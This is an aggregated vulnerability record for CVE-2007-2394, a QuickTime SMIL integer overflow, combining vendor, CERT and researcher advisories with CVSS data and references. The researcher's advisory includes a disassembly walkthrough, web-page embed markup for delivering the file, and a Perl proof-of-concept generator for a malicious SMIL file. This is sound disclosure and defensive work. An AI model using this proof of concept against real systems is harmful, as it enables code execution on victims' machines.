ID

VAR-200707-0547


CVE

CVE-2007-2394


TITLE

Apple QuickTime fails to properly handle malformed movie files

Trust: 0.8

sources: CERT/CC: VU#582681

DESCRIPTION

Integer overflow in Apple Quicktime before 7.2 on Mac OS X 10.3.9 and 10.4.9 allows user-assisted remote attackers to execute arbitrary code via crafted (1) title and (2) author fields in an SMIL file, related to improper calculations for memory allocation. Apple QuickTime fails to properly handle malformed movie files. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial-of-service condition. Apple QuickTime is prone to an information-disclosure and multiple remote code-execution vulnerabilities. Remote attackers may exploit these issues by enticing victims into opening maliciously crafted files or visiting maliciously crafted websites. Failed exploit attempts of remote code-execution issues may result in denial-of-service conditions. Successful exploits of the information-disclosure issue may lead to further attacks. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. The Full Featured Secunia Network Software Inspector (NSI) is now available: http://secunia.com/network_software_inspector/ The Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. ---------------------------------------------------------------------- TITLE: Apple QuickTime Multiple Vulnerabilities SECUNIA ADVISORY ID: SA26034 VERIFY ADVISORY: http://secunia.com/advisories/26034/ CRITICAL: Highly critical IMPACT: Exposure of sensitive information, DoS, System access WHERE: >From remote REVISION: 1.1 originally posted 2007-07-12 SOFTWARE: Apple QuickTime 7.x http://secunia.com/product/5090/ DESCRIPTION: Some vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to compromise a user's system. 1) An unspecified error exists in the processing of H.264 movies. 2) An unspecified error exists in the processing of movie files. 5) A design error exists in QuickTime for Java, which can be exploited to disable security checks and execute arbitrary code when a user visits a web site containing a specially crafted Java applet. 6) A design error exists in QuickTime for Java, which can be exploited to bypass security checks and read and write to process memory. 7) A design error exists in QuickTime for Java due to JDirect exposing interfaces that may allow loading arbitrary libraries and freeing arbitrary memory. 8) A design error exists in QuickTime for Java, which can be exploited to capture the user's screen content when a user visits a web site containing a specially crafted Java applet. QuickTime 7.2 for Mac: http://www.apple.com/support/downloads/quicktime72formac.html QuickTime 7.2 for Windows: http://www.apple.com/support/downloads/quicktime72forwindows.html PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Tom Ferris, Security-Protocols.com and Matt Slot, Ambrosia Software, Inc. 2) The vendor credits Jonathan 'Wolf' Rentzsch of Red Shed Software. 3) The vendor credits Tom Ferris, Security-Protocols.com. 5, 6, 7) The vendor credits Adam Gowdiak. 8) Reported by the vendor. CHANGELOG: 2007-07-12: Added link to US-CERT. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=305947 iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556 OTHER REFERENCES: US-CERT VU#582681: http://www.kb.cert.org/vuls/id/582681 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-193A Apple Releases Security Updates for QuickTime Original release date: July 12, 2007 Last revised: -- Source: US-CERT Systems Affected Apple QuickTime on systems running * Apple Mac OS X * Microsoft Windows Overview Apple QuickTime contains multiple vulnerabilities. I. Description Apple QuickTime 7.2 resolves multiple vulnerabilities in the way Java applets and various types of media files are handled. Since QuickTime configures most web browsers to handle QuickTime media files, an attacker could exploit these vulnerabilities using a web page. Note that QuickTime ships with Apple iTunes. For more information, please refer to the Vulnerability Notes Database. For further information, please see the Vulnerability Notes Database. Solution Upgrade QuickTime Upgrade to QuickTime 7.2. On Microsoft Windows, QuickTime users can install the update by using the built-in auto-update mechanism, Apple Software Update, or by installing the update manually. Disabling QuickTime in your web browser may defend against this attack vector. For more information, refer to the Securing Your Web Browser document. Disabling Java in your web browser may defend against this attack vector. Instructions for disabling Java can be found in the Securing Your Web Browser document. References * Vulnerability Notes for QuickTime 7.2 - <http://www.kb.cert.org/vuls/byid?searchview&query=QuickTime_72> * About the security content of the QuickTime 7.2 Update - <http://docs.info.apple.com/article.html?artnum=305947> * How to tell if Software Update for Windows is working correctly when no updates are available - <http://docs.info.apple.com/article.html?artnum=304263> * Apple QuickTime 7.2 for Windows - <http://www.apple.com/support/downloads/quicktime72forwindows.html> * Apple QuickTime 7.2 for Mac - <http://www.apple.com/support/downloads/quicktime72formac.html> * Standalone Apple QuickTime Player - <http://www.apple.com/quicktime/download/standalone.html> * Mac OS X: Updating your software - <http://docs.info.apple.com/article.html?artnum=106704> * Securing Your Web Browser - <http://www.us-cert.gov/reading_room/securing_browser/> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-193A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-193A Feedback VU#582681" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History Thursday July 12, 2007: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRpZsJ/RFkHkM87XOAQKLMgf9GpK/pbKTrSe0yKCRMt8Z4lMKl8VE+Rqr 4i8GfVXYUcBKbTlA8TTyf5ucbmCVAnjGJIq0W6X5gLBeA0QxCZ6qto/iPqviuvoV 8tu92/DuerYOkZMvJcn4RjAlMhM9CWCqJh1QG6R2Csn8AyeKEOFDiKYqoDzT+LoQ zojxmlNJIbUvIIGv8Z12Xkr1LLDmD4rs1nfDEBZm7yLTWRItmXpvSidftdUGETDZ +ok1SIhkZEbPNT7gAox9RZaKyIRHV7V4wZwqDd3weo6T7UPlhsgRqe88h1R5Yfq8 a7ePH0WSbTCqdGmuoM+nir4iDldoxB8OpbMUQH1nmWcDmc9xv++MHQ== =EV1X -----END PGP SIGNATURE----- . II. When parsing an SMIL file, arithmetic calculations can cause insufficient memory to be allocated. When copying in user-supplied data from the SMIL file, a heap-based buffer overflow occurs. This results in a potentially exploitable condition. III. This could be accomplished using a malicious SMIL file referenced from a website under the attacker's control. IV. Previous versions are suspected to be vulnerable. V. WORKAROUND iDefense is currently unaware of any effective workarounds for this vulnerability. VI. VENDOR RESPONSE Apple has released QuickTime 7.2 which resolves this issue. More information is available via Apple's QuickTime Security Update page at the URL shown below. http://docs.info.apple.com/article.html?artnum=305947 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-2394 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. CREDIT This vulnerability was reported to iDefense by David Vaartjes from ITsec Security Services http://www.itsec-ss.nl/. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . iDefense confirmed the existence of this vulnerability in version 7.1.3 and 7.1.5 for Windows XP SP2 and Mac OS X also [1]. As QuickTime binaries for Windows XP and Vista are identical, this issue will affect QuickTime running on Windows Vista also. ---------------------------------------------------------------------- FIXED VERSIONS ---------------------------------------------------------------------- Apple has released QuickTime version 7.2 for Mac OS X v10.3.9, Mac OS X v10.4.9 or later, Windows Vista and Windows XP SP2 to address this issue. See [2] for additional information about this update. QuickTime 7.2 is not available for the Windows 2000 platform. Presumably, Apple dropped support for this platform. ---------------------------------------------------------------------- PRODUCT DESCRIPTION ---------------------------------------------------------------------- QuickTime is Apple's media player product. According to Apple, QuickTime is downloaded over 10 million times a month. According to Secunia, QuickTime is currently installed on over 50% of PCs [3]. The Synchronized MultiMedia Integration Language (SMIL) provides a high-level scripting syntax for describing multimedia presentations. SMIL files are text files that use XML-based syntax to specify what media elements to present and where and when to present them. This can be exploited to overflow that heap buffer with user supplied content, which eventually can result in the execution of arbitrary code. -- <smil> <head> <meta name="title" content="specific-length"/> <meta name="author" content="specific-length"/> </head> </smil> -- When such a SMIL file is parsed the length value of the author field is stored in a short int data type (16 bit) without bounds checking. In sub_66952B50(), this value is (sign) extended to a long int data type (32 bit). -- 66952C9A push eax 66952C9B call sub_668B57D0 66952CA0 --> movsx eax, word ptr [esp+2Ch+var_C] 66952CA5 mov edx, [esp+2Ch+arg_4] 66952CA9 lea ecx, [esp+2Ch+var_10] -- So, when the length of the author field is >= 0x8000 bytes, it will be extended to a length value between 0xffff8000 and 0xffffffff. Next, in sub_668DCFD0() the sign extended length of the author field is added to the length of the title field + 0x20: -- 668DD04D jnz short loc_668DD0A0 668DD04F test ebx, ebx 668DD051 jz loc_668DD1EB 668DD057 --> lea eax, [edi+ebx] // edi holds the length of // the title field + 0x20. // ebx holds the sign // extended length of the // author field. 668DD05A push eax 668DD05B push ecx -- In sub_668DCA60(), 4 is added to the result of the calculation: -- 668DCB37 test edi, edi 668DCB39 jz short loc_668DCB40 668DCB3B --> lea eax, [edi+4] // edi holds the result 668DCB3E jmp short loc_668DCB42 -- Next, in sub_668F5550() the final length value is used as the dwBytes argument in a call to HeapRealloc(): -- 668F555E push eax // dwBytes (user specified) 668F555F push ecx // lpMem 668F5560 push 1 // dwFlags 668F5562 push edx // hHeap 668F5563 --> call ds:HeapReAlloc -- This allows for the allocation of a controlled amount of memory. For example, when setting the length of the author field to 0xff00 (65280) and the length of the title field to 0xdf (223), the following situation occurs: 1: sub_66952B50(): 0x0000ff00 will be sign extended to 0xffffff00. 2: sub_668DCFD0(): 0x000000ff (0x000000df + 0x00000020) will be added to 0xffffff00 resulting in a length value of 0xffffffff. 3: sub_668DCA60(): 0x00000004 is added to 0xffffffff, resulting in a value of 0x00000003. 4: sub_668F5550(): HeapRealloc() will allocate 0x00000003 bytes of memory. Next, the pointer returned by HeapRealloc() is used by sub_668DCFD0() as the dest argument in a call to memcpy(): -- 668DD08E push ebx // count, length value right // after sign extension // (0xffffff00). 668DD08F push edx // src, buffer with user // supplied (author) content. 668DD090 add eax, esi 668DD092 --> push eax // dest, 3 byte buffer. 668DD093 call _memcpy 668DD098 add esp, 18h 668DD09B jmp loc_668DD1E5 -- This copy action will result in an overflow of the 3 byte heap buffer with data from the author field (user supplied). Due to the large amount of data written, this will finally result in an access violation when memory is read or written outside the heap page. The exception is handled by the program and execution continues with a corrupt heap. For my platform (win2k), when a call to HeapAlloc() is executed the unlink code of ntdll will "fail" because we have overwritten pointers in the heap management structures of other heap buffers with our data. The status of the registers during unlinking is: -- EAX 78787878 <-- user supplied ECX 78787878 <-- user supplied EDX 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx" EBX 00000078 ESP 0012EDC8 EBP 0012EF84 ESI 01200000 EDI 012DF6F0 ASCII "xxxxxxxxxxx <-> xxxxxxxxxxxx" -- -- 77f867e6 mov dword ptr ds:[ecx],eax 77f867e8 mov dword ptr ds:[eax+4],ecx -- The unlink instructions will result in the following exception: --------------------------- QuickTimePlayerMain: QuickTimePlayer.exe "The instruction at "0x77f867e6" referenced memory at "0x78787878". The memory could not be "written" --------------------------- This shows that we are able to overwrite 4 bytes anywhere in the address space of the process with "any" 4 byte value we want, which can for example be exploited to overwrite function pointers like the SEH or UEF to gain control of the process. This 4 byte overwrite via the unlink code does not apply to XPSP2 and W2K3 as "safe unlinking" is used on these platforms. ---------------------------------------------------------------------- ATTACK VECTORS ---------------------------------------------------------------------- This vulnerability can be triggered by luring a target user into running a malicious SMIL file locally or via a webpage. In the later scenario the OBJECT (IE) and/or EMBED (FireFox) tags can be used: <OBJECT CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab" WIDTH="10" HEIGHT="10" > <!-- malicious SMIL file --> <PARAM NAME="src" VALUE="poc.smil" /> <EMBED <!-- available .qtif or .mov file to start up QT for FF --> SRC="available-sample.qtif" <!-- malicious SMIL file --> QTSRC="poc.smil" WIDTH="10" HEIGHT="10" PLUGINSPAGE="www.apple.com/quicktime/download" TYPE="video/quicktime" /> </OBJECT> ---------------------------------------------------------------------- PROOF OF CONCEPT ---------------------------------------------------------------------- #!/usr/bin/perl -w #### # QuickTime SMIL integer overflow vulnerability (CVE-2007-2394) POC # # Researched on QuickTime 7.1.3 on Windows 2000 SP4. # # David Vaartjes <d.vaartjes at gmail.com> #### $file = "poc.smil"; $padd = "x"; $cop_len = 36; #### # By choosing the following lengths the # integer overflow will be triggered. #### $tit_len = 223; $auth_len = 65280; open(FH,">$file") or die "Can't open file:$!"; print FH "<smil>\n". "<head>\n". " <meta name=\"title\" content=\"".$padd x $tit_len."\"/>\n". " <meta name=\"author\" content=\"".$padd x $auth_len."\"/>\n". " <meta name=\"copyright\" content=\"".$padd x $cop_len."\"/>\n". "</head>\n". "</smil>"; close(FH); ---------------------------------------------------------------------- REFERENCES ---------------------------------------------------------------------- [1] http://labs.idefense.com/intelligence/vulnerabilities/display.php? id=556 [2] http://docs.info.apple.com/article.html?artnum=305947 [3] http://secunia.com/blog/7/ ---------------------------------------------------------------------- DISCLOSURE TIMELINE ---------------------------------------------------------------------- 04/02/2007 Initial vendor notification (by iDefense) 04/09/2007 Initial vendor response 07/11/2007 Apple security bulletin & patches available 07/11/2007 Public disclosure of iDefense advisory 09/03/2007 Public disclosure of this advisory

Trust: 3.06

sources: NVD: CVE-2007-2394 // CERT/CC: VU#582681 // JVNDB: JVNDB-2007-000519 // BID: 24873 // VULHUB: VHN-25756 // PACKETSTORM: 57697 // PACKETSTORM: 57713 // PACKETSTORM: 57674 // PACKETSTORM: 59056

AFFECTED PRODUCTS

vendor:applemodel:quicktimescope:eqversion:7.1.2

Trust: 1.0

vendor:applemodel:quicktimescope:eqversion:7.1.3

Trust: 1.0

vendor:applemodel:quicktimescope:eqversion:7.0.4

Trust: 1.0

vendor:applemodel:quicktimescope:eqversion:7.1.4

Trust: 1.0

vendor:applemodel:quicktimescope:eqversion:7.0.1

Trust: 1.0

vendor:applemodel:quicktimescope:eqversion:7.1.5

Trust: 1.0

vendor:applemodel:quicktimescope:eqversion:7.1

Trust: 1.0

vendor:applemodel:quicktimescope:eqversion:7.0

Trust: 1.0

vendor:applemodel:quicktimescope:eqversion:7.0.2

Trust: 1.0

vendor:applemodel:quicktimescope:eqversion:7.1.1

Trust: 1.0

vendor:applemodel:quicktimescope:eqversion: -

Trust: 1.0

vendor:applemodel:quicktimescope:eqversion:7.0.3

Trust: 1.0

vendor:apple computermodel: - scope: - version: -

Trust: 0.8

vendor:applemodel:quicktimescope:ltversion:version

Trust: 0.8

vendor:applemodel:quicktimescope:eqversion:7.2

Trust: 0.8

vendor:applemodel:mac os xscope:eqversion:10.4.9

Trust: 0.6

vendor:applemodel:mac os xscope:eqversion:10.3.9

Trust: 0.6

vendor:applemodel:quicktime playerscope:eqversion:7.1.5

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:7.1.4

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:7.1.3

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:7.1.2

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:7.1.1

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:7.0.4

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:7.0.3

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:7.0.2

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:7.0.1

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:7.0

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:6.5.2

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:6.5.1

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:6.5

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:6.1

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:5.0.2

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:7.1

Trust: 0.3

vendor:applemodel:quicktime playerscope:eqversion:6

Trust: 0.3

vendor:applemodel:quicktimescope:neversion:7.2

Trust: 0.3

sources: CERT/CC: VU#582681 // BID: 24873 // JVNDB: JVNDB-2007-000519 // CNNVD: CNNVD-200707-274 // NVD: CVE-2007-2394

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2007-2394
value: HIGH

Trust: 1.0

CARNEGIE MELLON: VU#582681
value: 8.66

Trust: 0.8

NVD: CVE-2007-2394
value: HIGH

Trust: 0.8

CNNVD: CNNVD-200707-274
value: CRITICAL

Trust: 0.6

VULHUB: VHN-25756
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2007-2394
severity: HIGH
baseScore: 9.3
vectorString: AV:N/AC:M/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.6
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-25756
severity: HIGH
baseScore: 9.3
vectorString: AV:N/AC:M/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.6
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CERT/CC: VU#582681 // VULHUB: VHN-25756 // JVNDB: JVNDB-2007-000519 // CNNVD: CNNVD-200707-274 // NVD: CVE-2007-2394

PROBLEMTYPE DATA

problemtype:NVD-CWE-Other

Trust: 1.0

sources: NVD: CVE-2007-2394

THREAT TYPE

remote

Trust: 0.8

sources: PACKETSTORM: 57713 // PACKETSTORM: 57674 // CNNVD: CNNVD-200707-274

TYPE

input validation

Trust: 0.6

sources: CNNVD: CNNVD-200707-274

CONFIGURATIONS

sources: JVNDB: JVNDB-2007-000519

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-25756

PATCH

title:QuickTime 7.2 for Macurl:http://www.apple.com/support/downloads/quicktime72formac.html

Trust: 0.8

title:QuickTime 7.2 for Windowsurl:http://www.apple.com/support/downloads/quicktime72forwindows.html

Trust: 0.8

title:About the security content of QuickTime 7.2url:http://docs.info.apple.com/article.html?artnum=305947-en

Trust: 0.8

title:About the security content of QuickTime 7.2url:http://docs.info.apple.com/article.html?artnum=305947-ja

Trust: 0.8

title:アップル - QuickTimeurl:http://www.apple.com/jp/quicktime/download/win.html

Trust: 0.8

title:QuickTime 7.2 for Macurl:http://www.apple.com/jp/ftp-info/reference/quicktime72formac.html

Trust: 0.8

title:QuickTime 7.2 for Windowsurl:http://www.apple.com/jp/ftp-info/reference/quicktime72forwindows.html

Trust: 0.8

sources: JVNDB: JVNDB-2007-000519

EXTERNAL IDS

db:NVDid:CVE-2007-2394

Trust: 3.0

db:USCERTid:TA07-193A

Trust: 2.9

db:BIDid:24873

Trust: 2.8

db:SECUNIAid:26034

Trust: 2.7

db:SECTRACKid:1018373

Trust: 1.7

db:VUPENid:ADV-2007-2510

Trust: 1.7

db:XFid:35357

Trust: 1.4

db:CERT/CCid:VU#582681

Trust: 1.2

db:OSVDBid:36134

Trust: 1.1

db:USCERTid:SA07-193A

Trust: 0.8

db:JVNDBid:JVNDB-2007-000519

Trust: 0.8

db:CNNVDid:CNNVD-200707-274

Trust: 0.7

db:IDEFENSEid:20070711 APPLE QUICKTIME SMIL FILE PROCESSING INTEGER OVERFLOW VULNERABILITY

Trust: 0.6

db:BUGTRAQid:20070717 RE: IDEFENSE SECURITY ADVISORY 07.11.07: APPLE QUICKTIME SMIL FILE PROCESSING INTEGER OVERFLOW VULNERABILITY

Trust: 0.6

db:APPLEid:APPLE-SA-2007-07-11

Trust: 0.6

db:CERT/CCid:TA07-193A

Trust: 0.6

db:PACKETSTORMid:57674

Trust: 0.2

db:PACKETSTORMid:59056

Trust: 0.2

db:PACKETSTORMid:59040

Trust: 0.1

db:EXPLOIT-DBid:30292

Trust: 0.1

db:EXPLOIT-DBid:4359

Trust: 0.1

db:SEEBUGid:SSVID-83724

Trust: 0.1

db:SEEBUGid:SSVID-64870

Trust: 0.1

db:VULHUBid:VHN-25756

Trust: 0.1

db:PACKETSTORMid:57697

Trust: 0.1

db:PACKETSTORMid:57713

Trust: 0.1

sources: CERT/CC: VU#582681 // VULHUB: VHN-25756 // BID: 24873 // JVNDB: JVNDB-2007-000519 // PACKETSTORM: 57697 // PACKETSTORM: 57713 // PACKETSTORM: 57674 // PACKETSTORM: 59056 // CNNVD: CNNVD-200707-274 // NVD: CVE-2007-2394

REFERENCES

url:http://www.us-cert.gov/cas/techalerts/ta07-193a.html

Trust: 2.8

url:http://www.securityfocus.com/bid/24873

Trust: 2.5

url:http://secunia.com/advisories/26034

Trust: 2.5

url:http://docs.info.apple.com/article.html?artnum=305947

Trust: 2.3

url:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=556

Trust: 2.1

url:http://lists.apple.com/archives/security-announce/2007/jul/msg00001.html

Trust: 1.7

url:http://www.securitytracker.com/id?1018373

Trust: 1.7

url:http://www.frsirt.com/english/advisories/2007/2510

Trust: 1.4

url:http://xforce.iss.net/xforce/xfdb/35357

Trust: 1.4

url:http://www.securityfocus.com/archive/1/473882/100/100/threaded

Trust: 1.1

url:http://osvdb.org/36134

Trust: 1.1

url:http://www.vupen.com/english/advisories/2007/2510

Trust: 1.1

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/35357

Trust: 1.1

url:about vulnerability notes

Trust: 0.8

url:contact us about this vulnerability

Trust: 0.8

url:provide a vendor statement

Trust: 0.8

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2394

Trust: 0.8

url:http://jvn.jp/cert/jvnta07-193a/index.html

Trust: 0.8

url:http://jvn.jp/tr/trta07-193a/index.html

Trust: 0.8

url:http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-2394

Trust: 0.8

url:http://www.us-cert.gov/cas/alerts/sa07-193a.html

Trust: 0.8

url:http://www.securityfocus.com/archive/1/archive/1/473882/100/100/threaded

Trust: 0.6

url:http://www.kb.cert.org/vuls/id/582681

Trust: 0.4

url:http://software.cisco.com/download/navigator.html?mdfid=283613663

Trust: 0.3

url:/archive/1/473882

Trust: 0.3

url:https://nvd.nist.gov/vuln/detail/cve-2007-2394

Trust: 0.2

url:http://secunia.com/secunia_security_advisories/

Trust: 0.1

url:http://secunia.com/product/5090/

Trust: 0.1

url:http://secunia.com/network_software_inspector/

Trust: 0.1

url:http://www.apple.com/support/downloads/quicktime72formac.html

Trust: 0.1

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.1

url:http://secunia.com/advisories/26034/

Trust: 0.1

url:http://www.apple.com/support/downloads/quicktime72forwindows.html

Trust: 0.1

url:http://secunia.com/about_secunia_advisories/

Trust: 0.1

url:http://docs.info.apple.com/article.html?artnum=304263>

Trust: 0.1

url:http://www.us-cert.gov/cas/techalerts/ta07-193a.html>

Trust: 0.1

url:http://docs.info.apple.com/article.html?artnum=305947>

Trust: 0.1

url:http://www.apple.com/quicktime/download/standalone.html>

Trust: 0.1

url:http://www.apple.com/support/downloads/quicktime72formac.html>

Trust: 0.1

url:http://www.apple.com/support/downloads/quicktime72forwindows.html>

Trust: 0.1

url:http://www.us-cert.gov/legal.html>

Trust: 0.1

url:http://docs.info.apple.com/article.html?artnum=106704>

Trust: 0.1

url:http://www.us-cert.gov/cas/signup.html>.

Trust: 0.1

url:http://www.kb.cert.org/vuls/byid?searchview&query=quicktime_72>

Trust: 0.1

url:http://www.us-cert.gov/reading_room/securing_browser/>

Trust: 0.1

url:http://cve.mitre.org/),

Trust: 0.1

url:http://www.apple.com/quicktime/

Trust: 0.1

url:http://secunia.com/

Trust: 0.1

url:http://www.itsec-ss.nl/.

Trust: 0.1

url:http://labs.idefense.com/intelligence/vulnerabilities/

Trust: 0.1

url:http://labs.idefense.com/methodology/vulnerability/vcp.php

Trust: 0.1

url:http://labs.idefense.com/

Trust: 0.1

url:http://lists.grok.org.uk/full-disclosure-charter.html

Trust: 0.1

url:https://www.apple.com/quicktime/download"

Trust: 0.1

url:http://secunia.com/blog/7/

Trust: 0.1

url:http://labs.idefense.com/intelligence/vulnerabilities/display.php?

Trust: 0.1

url:http://www.apple.com/qtactivex/qtplugin.cab"

Trust: 0.1

sources: CERT/CC: VU#582681 // VULHUB: VHN-25756 // BID: 24873 // JVNDB: JVNDB-2007-000519 // PACKETSTORM: 57697 // PACKETSTORM: 57713 // PACKETSTORM: 57674 // PACKETSTORM: 59056 // CNNVD: CNNVD-200707-274 // NVD: CVE-2007-2394

CREDITS

Jonathan 'Wolf' RentzschDavid VaartjesAdam Gowdiak※ zupa@man.poznan.pl

Trust: 0.6

sources: CNNVD: CNNVD-200707-274

SOURCES

db:CERT/CCid:VU#582681
db:VULHUBid:VHN-25756
db:BIDid:24873
db:JVNDBid:JVNDB-2007-000519
db:PACKETSTORMid:57697
db:PACKETSTORMid:57713
db:PACKETSTORMid:57674
db:PACKETSTORMid:59056
db:CNNVDid:CNNVD-200707-274
db:NVDid:CVE-2007-2394

LAST UPDATE DATE

2025-04-10T20:23:17.334000+00:00


SOURCES UPDATE DATE

db:CERT/CCid:VU#582681date:2007-07-13T00:00:00
db:VULHUBid:VHN-25756date:2018-10-30T00:00:00
db:BIDid:24873date:2007-09-05T18:21:00
db:JVNDBid:JVNDB-2007-000519date:2007-07-24T00:00:00
db:CNNVDid:CNNVD-200707-274date:2007-07-18T00:00:00
db:NVDid:CVE-2007-2394date:2025-04-09T00:30:58.490

SOURCES RELEASE DATE

db:CERT/CCid:VU#582681date:2007-07-12T00:00:00
db:VULHUBid:VHN-25756date:2007-07-15T00:00:00
db:BIDid:24873date:2007-07-11T00:00:00
db:JVNDBid:JVNDB-2007-000519date:2007-07-24T00:00:00
db:PACKETSTORMid:57697date:2007-07-13T00:55:11
db:PACKETSTORMid:57713date:2007-07-13T01:43:24
db:PACKETSTORMid:57674date:2007-07-12T02:20:40
db:PACKETSTORMid:59056date:2007-09-05T04:22:40
db:CNNVDid:CNNVD-200707-274date:2007-07-15T00:00:00
db:NVDid:CVE-2007-2394date:2007-07-15T21:30:00